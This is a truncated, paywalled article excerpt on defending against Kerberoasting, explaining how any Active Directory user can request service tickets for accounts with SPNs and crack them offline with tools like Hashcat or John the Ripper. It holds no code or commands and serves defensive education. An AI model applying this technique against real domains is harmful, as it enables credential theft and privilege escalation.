Making Kerberoasting uneconomical
Sophisticated Heist
Unauthorized access to credentials is a part of virtually any successful cyberattack. Attackers are particularly interested in techniques that provide access credentials that allow far-reaching authorizations without immediately setting off the alarm bells on monitoring systems. Sometimes these techniques result from the functionality of Windows and Active Directory (AD).
Stolen and Broken
Kerberoasting [1] is an attack technique that relies on the ability of every user or computer to request, in Kerberos, a service ticket from the domain controller (DC) for every service. A check as to whether the requesting account has the right to do this only occurs when the service is accessed with this ticket. Therefore, if a security principal in the AD has a service principal name (SPN), any user – including a standard user or a workstation hijacked by an attacker – can grab a service ticket for this security principal from a DC.
The service ticket issued by the DC contains a part that is exclusively intended for the requested service principal and is also intended to ensure that the ticket was generated by the DC of the specified domain. For this purpose, the ticket is encrypted with the Kerberos hash of the service account, which is ideally only known to the DC and the account itself. However, the ticket contains plain text information that is known from the outset, such as the name of the requesting user, which allows the success of a decryption attempt to be verified quickly and reliably. The information attackers are looking for is not included in the payload, but used as an encryption key.
Kerberoasting therefore boils down to brute force. As a rule, the attackers first extract the complete service ticket from the compromised environment and use tools such as Hashcat or John the Ripper in their own environment to reconstruct
...Buy this article as PDF
(incl. VAT)